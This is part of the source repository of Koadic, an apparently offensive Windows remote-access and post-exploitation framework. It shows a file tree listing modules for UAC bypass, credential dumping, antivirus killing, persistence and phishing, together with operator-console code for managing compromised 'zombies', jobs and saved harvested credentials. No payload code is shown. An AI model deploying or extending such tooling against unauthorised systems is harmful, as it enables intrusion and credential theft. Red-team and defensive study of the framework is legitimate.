├── .gitattributes ├── .gitignore ├── .gitmodules ├── DEFCON25.pdf ├── Dockerfile ├── LICENSE ├── README.md ├── core ├── __init__.py ├── cidr.py ├── colors.py ├── commands │ ├── __init__.py │ ├── api.py │ ├── clear.py │ ├── cmdshell.py │ ├── createstager.py │ ├── creds.py │ ├── domain.py │ ├── edit.py │ ├── exit.py │ ├── help.py │ ├── info.py │ ├── jobs.py │ ├── kill.py │ ├── listeners.py │ ├── load.py │ ├── pabst.py │ ├── paddy.py │ ├── portfwd.py │ ├── previous.py │ ├── pyexec.py │ ├── repeatjobs.py │ ├── run.py │ ├── set.py │ ├── sounds.py │ ├── spool.py │ ├── taco.py │ ├── unset.py │ ├── use.py │ ├── valentine.py │ ├── verbose.py │ └── zombies.py ├── cred_parser.py ├── extant.py ├── handler.py ├── implant.py ├── job.py ├── linter.py ├── loader.py ├── mappings.py ├── options.py ├── payload.py ├── plugin.py ├── repeatjobclock.py ├── rest_server.py ├── restoreclock.py ├── server.py ├── session.py ├── shell.py ├── stager.py └── tick.py ├── data ├── banner.txt ├── banner_info.txt ├── bin │ ├── Tash │ │ ├── Release │ │ │ ├── Tash.dll │ │ │ ├── Tash.exp │ │ │ ├── Tash.lib │ │ │ ├── TashClient.exe │ │ │ ├── tash.x.js │ │ │ └── tash.y.js │ │ ├── Tash.sln │ │ ├── Tash.suo │ │ ├── Tash │ │ │ ├── ReadMe.txt │ │ │ ├── Tash.aps │ │ │ ├── Tash.cpp │ │ │ ├── Tash.def │ │ │ ├── Tash.idl │ │ │ ├── Tash.rc │ │ │ ├── Tash.rgs │ │ │ ├── Tash.vcproj │ │ │ ├── TashLoader.cpp │ │ │ ├── TashLoader.h │ │ │ ├── TashLoader.rgs │ │ │ ├── Tash_i.c │ │ │ ├── Tash_i.h │ │ │ ├── Tash_p.c │ │ │ ├── dlldata.c │ │ │ ├── dlldatax.c │ │ │ ├── dlldatax.h │ │ │ ├── dllmain.cpp │ │ │ ├── dllmain.h │ │ │ ├── resource.h │ │ │ ├── stdafx.cpp │ │ │ ├── stdafx.h │ │ │ └── targetver.h │ │ └── TashClient │ │ │ ├── ReadMe.txt │ │ │ ├── TashClient.cpp │ │ │ ├── TashClient.vcproj │ │ │ ├── stdafx.cpp │ │ │ ├── stdafx.h │ │ │ └── targetver.h │ ├── decode_syskey.py │ ├── dynwrapx.dll │ ├── mimishim.dll │ ├── mimishim.x64.dll │ ├── mimishim │ │ ├── .gitignore │ │ ├── README.md │ │ ├── ReflectiveDLLInjection │ │ │ 
├── .gitignore │ │ │ ├── LICENSE.txt │ │ │ ├── Readme.md │ │ │ ├── dll │ │ │ │ ├── koadic_load.c │ │ │ │ ├── koadic_load.h │ │ │ │ ├── koadic_net.c │ │ │ │ ├── koadic_net.h │ │ │ │ ├── koadic_process.c │ │ │ │ ├── koadic_process.h │ │ │ │ ├── koadic_types.h │ │ │ │ ├── koadic_util.c │ │ │ │ ├── koadic_util.h │ │ │ │ ├── metasploit │ │ │ │ │ ├── metasploit_inject.c │ │ │ │ │ ├── metasploit_inject.h │ │ │ │ │ ├── metasploit_loader.c │ │ │ │ │ ├── metasploit_loader.h │ │ │ │ │ ├── metasploit_ps.c │ │ │ │ │ └── metasploit_ps.h │ │ │ │ ├── mimishim.filters │ │ │ │ ├── mimishim.sln │ │ │ │ ├── mimishim.vcproj │ │ │ │ ├── mimishim.vcxproj │ │ │ │ └── src │ │ │ │ │ ├── ReflectiveDLLInjection.h │ │ │ │ │ ├── ReflectiveDll.c │ │ │ │ │ ├── ReflectiveLoader.c │ │ │ │ │ └── ReflectiveLoader.h │ │ │ ├── inject │ │ │ │ ├── inject.sln │ │ │ │ ├── inject.vcproj │ │ │ │ ├── inject.vcxproj │ │ │ │ ├── inject.vcxproj.filters │ │ │ │ └── src │ │ │ │ │ ├── GetProcAddressR.c │ │ │ │ │ ├── GetProcAddressR.h │ │ │ │ │ ├── Inject.c │ │ │ │ │ ├── LoadLibraryR.c │ │ │ │ │ ├── LoadLibraryR.h │ │ │ │ │ └── ReflectiveDLLInjection.h │ │ │ └── rdi.sln │ │ ├── emu │ │ │ ├── powerkatz32.py │ │ │ └── powerkatz64.py │ │ └── server.py │ ├── parse_lsass.py │ ├── powerkatz32.dll │ ├── powerkatz64.dll │ ├── secretsdump │ │ └── secretsdump.py │ ├── shellcode_dotnet2js.cs │ └── shellcode_dotnet2js.dll ├── implant │ ├── elevate │ │ ├── bypassuac_compdefaults.js │ │ ├── bypassuac_compmgmtlauncher.js │ │ ├── bypassuac_eventvwr.js │ │ ├── bypassuac_eventvwr.vbs │ │ ├── bypassuac_fodhelper.js │ │ ├── bypassuac_sdclt.js │ │ ├── bypassuac_slui.js │ │ ├── bypassuac_systempropertiesadvanced.js │ │ ├── bypassuac_wsreset.js │ │ └── system_createservice.js │ ├── fun │ │ ├── thunderstruck.js │ │ ├── thunderstruck.vbs │ │ ├── voice.js │ │ └── voice.vbs │ ├── gather │ │ ├── clipboard.js │ │ ├── clipboard.vbs │ │ ├── comsvcs_lsass.js │ │ ├── enum_domain_info.js │ │ ├── enum_printers.js │ │ ├── enum_shares.js │ │ ├── 
enum_users.js │ │ ├── enum_users.js.old │ │ ├── hashdump_dc.js │ │ ├── hashdump_sam.js │ │ ├── loot_finder.js │ │ └── user_hunter.js │ ├── inject │ │ ├── mimikatz_dotnet2js.js │ │ ├── mimikatz_dynwrapx.js │ │ ├── mimikatz_tashlib.js │ │ ├── reflectdll_excel.js │ │ ├── shellcode.vba │ │ ├── shellcode_dotnet2js.js │ │ ├── shellcode_dynwrapx.js │ │ └── shellcode_excel.js │ ├── manage │ │ ├── enable_rdesktop.js │ │ ├── enable_rdesktop.vbs │ │ ├── exec_cmd.js │ │ ├── exec_cmd.vbs │ │ └── killav.vbs │ ├── persist │ │ ├── add_user.js │ │ ├── registry.dropper │ │ ├── registry.js │ │ ├── schtasks.dropper │ │ ├── schtasks.js │ │ ├── wmi.dropper │ │ └── wmi.js │ ├── phish │ │ ├── password_box.js │ │ └── password_box.vbs │ ├── pivot │ │ ├── exec_psexec.js │ │ ├── exec_wmi.js │ │ └── exec_wmi.vbs │ ├── scan │ │ ├── tcp.js │ │ └── tcp.vbs │ └── util │ │ ├── download_file.js │ │ ├── download_file.vbs │ │ ├── upload_file.js │ │ └── upload_file.vbs ├── pabst.txt ├── shamrock.txt ├── stager │ ├── js │ │ ├── bitsadmin │ │ │ ├── bitsadmin.cmd │ │ │ └── template.wsf │ │ ├── disk │ │ │ └── disk.cmd │ │ ├── mshta │ │ │ ├── mshta.cmd │ │ │ └── template.hta │ │ ├── mshtajs │ │ │ └── mshtajs.cmd │ │ ├── regsvr │ │ │ ├── regsvr.cmd │ │ │ └── template.sct │ │ ├── rundll32 │ │ │ └── rundll32.cmd │ │ ├── rundll32_js │ │ │ └── rundll32_js.cmd │ │ ├── stage.js │ │ ├── stdlib.js │ │ └── wmic │ │ │ ├── template.xsl │ │ │ └── wmic.cmd │ └── vbscript │ │ ├── disk.cmd │ │ ├── mshta.cmd │ │ ├── stdlib.vbs │ │ └── work.vbs ├── taco.txt └── valentine.txt ├── koadic ├── modules ├── implant │ ├── elevate │ │ ├── bypassuac_compdefaults.py │ │ ├── bypassuac_compmgmtlauncher.py │ │ ├── bypassuac_eventvwr.py │ │ ├── bypassuac_fodhelper.py │ │ ├── bypassuac_sdclt.py │ │ ├── bypassuac_slui.py │ │ ├── bypassuac_systempropertiesadvanced.py │ │ ├── bypassuac_wsreset.py │ │ └── system_createservice.py │ ├── fun │ │ ├── thunderstruck.py │ │ └── voice.py │ ├── gather │ │ ├── clipboard.py │ │ ├── comsvcs_lsass.py │ │ 
├── enum_domain_info.py │ │ ├── enum_printers.py │ │ ├── enum_shares.py │ │ ├── enum_users.py │ │ ├── hashdump_dc.py │ │ ├── hashdump_sam.py │ │ ├── loot_finder.py │ │ ├── office_key.py │ │ ├── user_hunter.py │ │ └── windows_key.py │ ├── inject │ │ ├── mimikatz_dotnet2js.py │ │ ├── mimikatz_dynwrapx.py │ │ ├── mimikatz_tashlib.py │ │ ├── reflectdll_excel.py │ │ ├── shellcode_dotnet2js.py │ │ ├── shellcode_dynwrapx.py │ │ └── shellcode_excel.py │ ├── manage │ │ ├── enable_rdesktop.py │ │ ├── exec_cmd.py │ │ └── killav.py │ ├── persist │ │ ├── add_user.py │ │ ├── registry.py │ │ ├── schtasks.py │ │ └── wmi.py │ ├── phish │ │ └── password_box.py │ ├── pivot │ │ ├── exec_psexec.py │ │ ├── exec_wmi.py │ │ ├── exec_wmic.py │ │ └── stage_wmi.py │ ├── scan │ │ └── tcp.py │ └── util │ │ ├── download_file.py │ │ ├── multi_module.py │ │ └── upload_file.py └── stager │ ├── js │ ├── bitsadmin.py │ ├── disk.py │ ├── mshta.py │ ├── regsvr.py │ ├── rundll32_js.py │ └── wmic.py │ ├── jscript.py │ ├── powershell.py │ └── vbscript.py └── requirements.txt /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | restore.json 3 | restores/ 4 | core/sounds.py 5 | data/bin/sounds/* 6 | autorun.example 7 | # Byte-compiled / optimized / DLL files 8 | __pycache__/ 9 | *.py[cod] 10 | *$py.class 11 | 12 | # C extensions 13 | *.so 14 | 15 | # Distribution / packaging 16 | .Python 17 | env/ 18 | build/ 19 | develop-eggs/ 20 | dist/ 21 | downloads/ 22 | eggs/ 23 | .eggs/ 24 | lib/ 25 | lib64/ 26 | parts/ 27 | sdist/ 28 | var/ 29 | wheels/ 30 | *.egg-info/ 31 | .installed.cfg 32 | *.egg 33 | 34 | # PyInstaller 35 | # Usually these files are written by a python script from a template 36 | # 
before PyInstaller builds the exe, so as to inject date/other infos into it. 37 | *.manifest 38 | *.spec 39 | 40 | # Installer logs 41 | pip-log.txt 42 | pip-delete-this-directory.txt 43 | 44 | # Unit test / coverage reports 45 | htmlcov/ 46 | .tox/ 47 | .coverage 48 | .coverage.* 49 | .cache 50 | nosetests.xml 51 | coverage.xml 52 | *.cover 53 | .hypothesis/ 54 | 55 | # Translations 56 | *.mo 57 | *.pot 58 | 59 | # Django stuff: 60 | *.log 61 | local_settings.py 62 | 63 | # Flask stuff: 64 | instance/ 65 | .webassets-cache 66 | 67 | # Scrapy stuff: 68 | .scrapy 69 | 70 | # Sphinx documentation 71 | docs/_build/ 72 | 73 | # PyBuilder 74 | target/ 75 | 76 | # Jupyter Notebook 77 | .ipynb_checkpoints 78 | 79 | # pyenv 80 | .python-version 81 | 82 | # celery beat schedule file 83 | celerybeat-schedule 84 | 85 | # SageMath parsed files 86 | *.sage.py 87 | 88 | # dotenv 89 | .env 90 | 91 | # virtualenv 92 | .venv 93 | venv/ 94 | ENV/ 95 | 96 | # Spyder project settings 97 | .spyderproject 98 | .spyproject 99 | 100 | # Rope project settings 101 | .ropeproject 102 | 103 | # mkdocs documentation 104 | /site 105 | 106 | # mypy 107 | .mypy_cache/ 108 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "impacket"] 2 | path = data/impacket 3 | url = https://github.com/CoreSecurity/impacket.git 4 | -------------------------------------------------------------------------------- /DEFCON25.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/DEFCON25.pdf -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:19.10 2 | WORKDIR /opt/koadic 3 | RUN apt-get update && apt-get install -y 
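python3 python3-pip socat
COPY . /opt/koadic
RUN pip3 install -r requirements.txt
ENTRYPOINT ["./koadic"]
-------------------------------------------------------------------------------- /core/__init__.py: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/core/__init__.py
-------------------------------------------------------------------------------- /core/colors.py: --------------------------------------------------------------------------------
class Colors(object):
    """ANSI colour helpers for the interactive shell.

    Every public method returns ``text`` wrapped in an SGR start sequence and
    the reset sequence ``ENDC``; nothing is printed here.
    """

    def __init__(self):
        # http://ozzmaker.com/add-colour-to-text-in-python/
        self.ENDC = '\033[0m'

        # SGR foreground colour codes, kept as strings so they can be joined.
        self.RED = '31'
        self.GREEN = '32'
        self.YELLOW = '33'
        self.BLUE = '34'
        self.CYAN = '36'

        # SGR attribute codes.
        self.NORMAL = '0'
        self.BOLD = '1'
        # NOTE(review): SGR 2 renders as "faint" in most terminals (underline
        # is 4). Left as-is because callers may rely on the current look.
        self.UNDERLINE = '2'

    def error(self, text):
        """Bold red."""
        return self.colorize(text, [self.RED, self.BOLD])

    def warning(self, text):
        """Bold yellow."""
        return self.colorize(text, [self.YELLOW, self.BOLD])

    def good(self, text):
        """Bold green."""
        return self.colorize(text, [self.GREEN, self.BOLD])

    def status(self, text):
        """Bold blue."""
        return self.colorize(text, [self.BLUE, self.BOLD])

    def colorize(self, text, options, readline=False):
        """Wrap ``text`` in an SGR escape built from ``options``.

        Args:
            text: string to decorate.
            options: one SGR code (``'1'``) or a list of codes
                (``['31', '1']``). Several commands pass a bare string such
                as ``colors.BOLD``; that only worked for single-character
                codes because ``";".join("31")`` yields ``"3;1"``, so a
                string is now wrapped in a list first.
            readline: when True the non-printing escapes are bracketed with
                ``\\001``/``\\002`` so readline does not count them toward
                the prompt width.

        Returns:
            The decorated string.
        """
        if isinstance(options, str):
            options = [options]
        sgr = '\033[' + ";".join(options) + "m"
        if readline:
            return "\001" + sgr + "\002" + text + "\001" + self.ENDC + "\002"
        return sgr + text + self.ENDC

    def get_prompt(self, state, isreadline=True):
        """Build the coloured ``(koadic: state)$ `` prompt.

        Args:
            state: slash-separated module path; every component except the
                last is abbreviated to its first three characters.
            isreadline: passed through to ``colorize`` as its readline flag.

        Returns:
            The prompt string.
        """
        import os
        # '#' when running as root, '$' otherwise (os.geteuid is POSIX-only).
        glyph = "#" if os.geteuid() == 0 else "$"
        parts = state.split("/")
        abbreviated = [s[0:3] for s in parts[:-1]] + [parts[-1]]
        state = "/".join(abbreviated)
        return "%s%s: %s%s" % (
            self.colorize("(", [self.GREEN], isreadline),
            self.colorize("koadic", [self.BOLD], isreadline),
            self.colorize(state, [self.CYAN], isreadline),
            self.colorize(")" + glyph + " ", [self.GREEN], isreadline),
        )
-------------------------------------------------------------------------------- /core/commands/__init__.py: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/core/commands/__init__.py
-------------------------------------------------------------------------------- /core/commands/clear.py: --------------------------------------------------------------------------------
DESCRIPTION = "clear the screen"

def autocomplete(shell, line, text, state):
    """``clear`` takes no arguments, so there is nothing to complete."""
    return None

def help(shell):
    """``clear`` has no options to explain."""
    pass

def execute(shell, cmd):
    """Erase the screen and move the cursor home (ANSI ED + CUP)."""
    print("\x1b[2J\x1b[H")
-------------------------------------------------------------------------------- /core/commands/edit.py: --------------------------------------------------------------------------------
DESCRIPTION = "shell out to an editor for the current module"

def autocomplete(shell, line, text, state):
    """No completions for ``edit``."""
    return None

def help(shell):
    """Print usage for the ``edit`` command."""
    shell.print_plain("")
    shell.print_plain("Use %s to edit the current module's python file" % (shell.colors.colorize("edit / edit py / edit python", shell.colors.BOLD)))
    shell.print_plain("Use %s to edit the current module's associated javascript file (if applicable)" % (shell.colors.colorize("edit js / edit javascript", shell.colors.BOLD)))
    shell.print_plain("Use %s to edit the current module's associated vbscript file (if applicable)" % (shell.colors.colorize("edit vbs / edit vbscript", shell.colors.BOLD)))
    shell.print_plain("")
    shell.print_plain("NOTE: Uses $EDITOR env variable, otherwise will fallback to vi.")
    shell.print_plain("")

def _pick_editor(shell):
    """Return the editor program from $EDITOR, or ``vi`` after a warning.

    An unset variable and an empty one are reported with different messages,
    as before.
    """
    import os
    try:
        editor = os.environ['EDITOR']
    except KeyError:
        shell.print_error("$EDITOR env variable does not exist, falling back to vi!")
        return 'vi'
    if not editor:
        shell.print_error("$EDITOR env variable not set, falling back to vi!")
        return 'vi'
    return editor

def execute(shell, cmd):
    """Open the current module, or one of its companion files, in an editor.

    ``cmd`` is ``edit [py|python|js|javascript|vbs|vbscript|dropper]``. With
    no argument the module's python file is opened without an existence
    check; with an argument an unknown type or a missing file returns
    silently. The editor runs as an argv list (no shell), so an $EDITOR
    value that carries arguments, e.g. "code -w", is treated as one program
    name. After the editor exits all modules are reloaded via ``load``.
    """
    import subprocess, os

    editor = _pick_editor(shell)

    targets = {
        "py": "modules/" + shell.state + ".py",
        "js": "data/" + shell.state + ".js",
        "vbs": "data/" + shell.state + ".vbs",
        "dropper": "data/" + shell.state + ".dropper",
    }
    aliases = {"python": "py", "javascript": "js", "vbscript": "vbs"}

    splitted = cmd.split()
    if len(splitted) > 1:
        ftype = splitted[1].lower()
        target = targets.get(aliases.get(ftype, ftype))
        if target is None or not os.path.isfile(target):
            return
    else:
        target = targets["py"]

    subprocess.call([editor, target])
    shell.run_command('load')
-------------------------------------------------------------------------------- /core/commands/exit.py: --------------------------------------------------------------------------------
DESCRIPTION = "exits the program"

def autocomplete(shell, line, text, state):
    """No completions for ``exit``."""
    return None

def help(shell):
    """``exit`` has no options to explain."""
    pass

def convert_to_parsable(obj):
    """Make a creds/domain-info container JSON-serialisable.

    Tuple keys (dict) or tuple items (list) become ``'/'``-joined strings,
    plain-string keys/items are kept, anything else is dropped. Any other
    input type yields an empty list.

    Args:
        obj: a dict, a list, or anything else.

    Returns:
        A new dict or list; never the input object itself.
    """
    if isinstance(obj, dict):
        new_obj = {}
        for key, value in obj.items():
            if isinstance(key, tuple):
                new_obj['/'.join(key)] = value
            elif isinstance(key, str):
                new_obj[key] = value
        return new_obj

    if isinstance(obj, list):
        new_obj = []
        for item in obj:
            if isinstance(item, tuple):
                new_obj.append('/'.join(item))
            elif isinstance(item, str):
                new_obj.append(item)
        return new_obj

    return []


def execute(shell, cmd):
    """Save restorable state to ``restore.json`` and exit with status 0.

    The file is written only when at least one of creds, creds_keys,
    domain_info, jobs or sessions is non-empty. It lands in the current
    working directory as plaintext JSON and holds the harvested credentials
    and session details, so where it is written and who can read it is up to
    the operator.
    """
    import json
    import sys

    restore_map = {
        'creds': convert_to_parsable(shell.creds),
        'creds_keys': convert_to_parsable(shell.creds_keys),
        'domain_info': convert_to_parsable(shell.domain_info),
        'jobs': [],
        'sessions': [],
    }

    for j in shell.jobs.values():
        restore_map['jobs'].append({
            'results': j.results,
            'id': j.id,
            # Jobs are detached from their session when saved.
            'session_id': -1,
            'completed': j.completed,
            'ip': j.ip,
            'name': j.name,
            'key': j.key,
        })

    for session in shell.sessions.values():
        new_s = dict(vars(session))
        # Live objects cannot be serialised; drop each independently. The old
        # code popped both inside one try, so a missing 'stager' left 'shell'
        # in place and json.dumps below would then fail.
        new_s.pop('stager', None)
        new_s.pop('shell', None)
        new_s['status'] = 0
        restore_map['sessions'].append(new_s)

    if any(restore_map.values()):
        with open('restore.json', 'w') as restore:
            restore.write(json.dumps(restore_map) + "\n")

    sys.exit(0)
-------------------------------------------------------------------------------- /core/commands/help.py: --------------------------------------------------------------------------------
DESCRIPTION = "displays help info for a command"


def autocomplete(shell, line, text, state):

    # should never go this big...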
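# continuation of autocomplete() in core/commands/help.py (its signature is on the previous page line)
    if len(line.split()) > 2:
        return None

    options = [x + " " for x in shell.actions if x.startswith(text)]

    # ``state`` is readline's match index; past the end means "no more".
    try:
        return options[state]
    except IndexError:
        return None


def help(shell):
    """Help for ``help`` itself."""
    shell.print_plain("")
    shell.print_plain("You definitely need help")
    shell.print_plain("")

def execute(shell, cmd):
    """``help`` lists every command; ``help NAME`` shows one command's help."""
    splitted = cmd.split()

    if len(splitted) == 1:
        return help_all(shell)

    if len(splitted) > 1:
        return help_command(shell, splitted[1])


def help_command(shell, command):
    """Delegate to the command module's own ``help``; unknown names print an error."""
    if command not in shell.actions:
        shell.print_error("No command named %s" % command)
        return

    shell.actions[command].help(shell)


def help_all(shell):
    """Print the table of commands, skipping modules flagged ``hidden_command``."""
    formats = '\t{0:<14}{1:<16}'

    shell.print_plain("")
    shell.print_plain(formats.format("COMMAND", "DESCRIPTION"))
    shell.print_plain(formats.format("---------", "-------------"))

    for key, env in sorted(shell.actions.items()):
        if getattr(env, "hidden_command", False):
            continue
        shell.print_plain(formats.format(key, env.DESCRIPTION))

    shell.print_plain("")
    shell.print_plain('Use "help %s" to find more info about a command.' % shell.colors.colorize("command", [shell.colors.BOLD]))
    shell.print_plain("")
-------------------------------------------------------------------------------- /core/commands/info.py: --------------------------------------------------------------------------------
DESCRIPTION = "shows the current module options"

def autocomplete(shell, line, text, state):
    """No completions for ``info``."""
    return None

def help(shell):
    """Print usage for the ``info`` command."""
    shell.print_plain("")
    shell.print_plain("Use %s for advanced options" % (shell.colors.colorize("info -a", shell.colors.BOLD)))
    shell.print_plain("")

def execute(shell, cmd):
    """Print a table of the current module's options.

    Hidden options are never shown; advanced options only when ``-a`` is on
    the command line. The NAME column is sized from the longest visible name
    and values longer than 16 characters are truncated with ``...``.
    """
    env = shell.plugins[shell.state]
    show_advanced = " -a" in cmd

    visible = [
        option for option in env.options.options
        if not option.hidden and (show_advanced or not option.advanced)
    ]

    # dynamically set format length
    maxlen = max((len(option.name) for option in visible), default=0)
    formats = '\t{{0:<{0}}}{{1:<20}}{{2:<8}}{{3:<16}}'.format(maxlen+3)

    shell.print_plain("")
    shell.print_plain(formats.format("NAME", "VALUE", "REQ", "DESCRIPTION"))
    shell.print_plain(formats.format("-----","------------", "----", "-------------"))

    for option in visible:
        prettybool = "yes" if option.required else "no"
        value = str(option.value)
        if len(value) > 16:
            value = value[0:16] + "..."
        shell.print_plain(formats.format(option.name, value, prettybool, option.description))

    shell.print_plain("")
-------------------------------------------------------------------------------- /core/commands/jobs.py: --------------------------------------------------------------------------------
DESCRIPTION = "shows info about jobs"

def autocomplete(shell, line, text, state):
    """No completions for ``jobs``."""
    pass

def help(shell):
    """Print usage for the ``jobs`` command."""
    shell.print_plain("")
    shell.print_plain("Use %s to view job results (if any)" % (shell.colors.colorize("jobs JOB_ID", shell.colors.BOLD)))
    shell.print_plain("Use %s to hide/unhide a job (or multiple jobs)" % (shell.colors.colorize("jobs -h JOB_ID[,JOB_ID,JOB_ID-JOB_ID]", shell.colors.BOLD)))
    shell.print_plain("Use %s to view hidden jobs" % (shell.colors.colorize("jobs -h", shell.colors.BOLD)))
    shell.print_plain("")

def print_job(shell, id):
    """Display the results of the finished job whose id matches ``id``.

    Raises:
        ValueError: ``id`` is not an integer string. The conversion now
        happens up front, so a bad id is rejected even when there are no
        jobs (the old per-job ``int(id)`` was never reached in that case).
    """
    wanted = int(id)
    for job in shell.jobs.values():
        if job.id == wanted and job.status_string() in ["Complete", "Failed"]:
            job.display()

def hide_jobs(shell, ids):
    """Toggle the hidden flag of the jobs in ``ids``.

    ``ids`` is a comma-separated list of ids and inclusive ``A-B`` ranges,
    e.g. ``"1,3-5"``. The whole spec is parsed before anything is toggled so
    a malformed entry leaves every job untouched.

    Raises:
        ValueError: a non-numeric entry.
    """
    all_ids = set()
    for spec in ids.split(','):
        if '-' in spec:
            first, last = spec.split('-')[0], spec.split('-')[-1]
            all_ids.update(range(int(first), int(last) + 1))
        else:
            all_ids.add(int(spec))
    for job in shell.jobs.values():
        if job.id in all_ids:
            job.hidden = not job.hidden

def print_all_jobs(shell, hidden=False):
    """Print the job table; ``hidden`` selects the hidden or the visible set."""
    formats = "\t{0:<5}{1:<10}{2:<20}{3:<40}"

    shell.print_plain("")
    shell.print_plain(formats.format("ID", "STATUS", "ZOMBIE", "NAME"))
    shell.print_plain(formats.format("-"*4, "-"*9, "-"*10, "-"*20))
    for job in shell.jobs.values():
        if job.hidden != hidden:
            continue
        # A session_id of -1 (what exit.py stores when saving) is printed
        # as-is; the old code special-cased it to produce identical text.
        zombie = "%s (%d)" % (job.ip, job.session_id)
        shell.print_plain(formats.format(job.id, job.status_string(), zombie, job.name))

    shell.print_plain("")


def execute(shell, cmd):
    """Dispatch ``jobs``, ``jobs -h``, ``jobs -h IDS`` and ``jobs ID``."""
    splitted = cmd.split()

    if len(splitted) > 2:
        if splitted[1] == '-h':
            try:
                hide_jobs(shell, splitted[2])
            except ValueError:
                shell.print_error("Unknown option '"+splitted[2]+"'")
            return
        shell.print_error("Unknown option '"+splitted[1]+"'")
    elif len(splitted) > 1 and splitted[1] == '-h':
        print_all_jobs(shell, True)
        return
    elif len(splitted) > 1:
        try:
            print_job(shell, splitted[1])
        except ValueError:
            shell.print_error("Unknown option '"+splitted[1]+"'")
        return

    print_all_jobs(shell)
-------------------------------------------------------------------------------- /core/commands/kill.py: --------------------------------------------------------------------------------
DESCRIPTION = "kill a zombie by ID"

def autocomplete(shell, line, text, state):
    """No completions for ``kill``."""
    pass

def help(shell):
    """Print usage for the ``kill`` command."""
    shell.print_plain("")
    shell.print_plain("Usage: kill #")
    shell.print_plain(" kill all")
    shell.print_plain(" kill dead")
    shell.print_plain("")

def kill_zombie(shell, id):
    """Kill the zombies selected by ``id``: a numeric session id, ``all`` or ``dead``.

    Sessions already flagged ``killed`` are skipped; ``dead`` selects
    sessions whose ``status`` is 0. A summary line is printed for the two
    bulk forms and the 'KILL' sound plays in every case. Assumes
    ``session.killed`` is a bool, as the old ``== False`` test did.
    """
    selector = id.lower()
    if not id.isdigit() and selector not in ["all", "dead"]:
        shell.print_error("Not a valid argument to kill: %s" % id)
        return

    for session in shell.sessions.values():
        if session.killed:
            continue
        if selector == "all":
            matched = True
        elif selector == "dead":
            matched = session.status == 0
        else:
            matched = session.id == int(id)
        if matched:
            session.kill()

    if selector == "all":
        shell.print_good("All Zombies Killed!")
    elif selector == "dead":
        shell.print_good("Dead Zombies Killed!")

    shell.play_sound('KILL')

def execute(shell, cmd):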
37 | 38 | splitted = cmd.split() 39 | 40 | if len(splitted) > 1: 41 | id = splitted[1] 42 | kill_zombie(shell, id) 43 | return 44 | 45 | help(shell) 46 | -------------------------------------------------------------------------------- /core/commands/load.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import importlib 3 | import core.plugin 4 | import copy 5 | 6 | DESCRIPTION = "reloads all modules" 7 | 8 | def autocomplete(shell, line, text, state): 9 | return None 10 | 11 | def help(shell): 12 | pass 13 | 14 | def execute(shell, cmd): 15 | count = 0 16 | for key in shell.plugins: 17 | _key = key 18 | 19 | try: 20 | key = key.split("/")[-1] 21 | module = sys.modules[key] 22 | source = open("modules/"+_key+".py").read() 23 | exec(source,module.__dict__) 24 | 25 | for thing in dir(module): 26 | try: 27 | thing = getattr(module, thing) 28 | 29 | if issubclass(thing, core.plugin.Plugin): 30 | new_thing = thing(shell) 31 | new_thing.options = copy.deepcopy(shell.plugins[_key].options) 32 | shell.plugins[_key] = new_thing 33 | count += 1 34 | except TypeError as e: 35 | pass 36 | except: 37 | shell.print_error("Failed to load %s" % _key) 38 | pass 39 | 40 | shell.play_sound('LOAD') 41 | shell.print_good("Successfully loaded %d modules." 
% count) 42 | -------------------------------------------------------------------------------- /core/commands/pabst.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "PBR Friday" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | 11 | print(open("data/pabst.txt", "rb").read().decode("unicode_escape")) 12 | -------------------------------------------------------------------------------- /core/commands/paddy.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "It's paddy, not patty" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | 11 | print(open("data/shamrock.txt", "rb").read().decode("unicode_escape")) 12 | -------------------------------------------------------------------------------- /core/commands/portfwd.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "stub command for help text" 2 | hidden_command = True 3 | 4 | def autocomplete(shell, line, text, state): 5 | return None 6 | 7 | def help(shell): 8 | msg = """ 9 | Unlike most connectback RATs, Koadic does not rely on a single long-lived TCP connection. Windows Script Host isn't smart enough to do that. Instead, Koadic uses repeated HTTP requests in separate connections. It is important that you not modify the URL of a listener between when Koadic spits it out and when it is executed on the host because the very first thing Koadic is going to try and do after the first connection is establish a second connection - and it's going to try and make the second connection using the URL Koadic knows about, not the one you executed. 10 | 11 | So! How do I use Koadic through a port forward? Easy! Just make Koadic generate the correct URL right out of the gate. 
Set SRVHOST and SRVPORT to whatever address the target box needs to initiate connections to. It doesn't matter if that's not a local address on the host where Koadic is running. Koadic will just bind 0.0.0.0 and accept connections from anywhere. 12 | 13 | ----- 14 | 15 | Stagers now have an AUTOFWD option that defaults to true. This is supposed to solve the problem posed above by checking out the Host header and using this to override SRVHOST and SRVPORT. If for some reason Host headers are not included in requests, then this will not work and you will need to follow the advice above. Setting AUTOFWD false will force stagers to not respect a differing Host header and Zombies will not attempt to stage. 16 | """.strip() 17 | try: 18 | import textwrap 19 | msg2 = "" 20 | for paragraph in msg.split("\n\n"): 21 | msg2 += "\n".join(textwrap.wrap(paragraph)) 22 | msg2 += "\n\n" 23 | msg = msg2.strip() 24 | except: 25 | pass 26 | shell.print_plain(msg) 27 | 28 | def execute(shell, cmd): 29 | shell.print_plain("Sorry! This is just a stub-command to explain how to stage Koadic through a port forward. Windows Script Host is not smart enough for Koadic to do its own port forwards. 
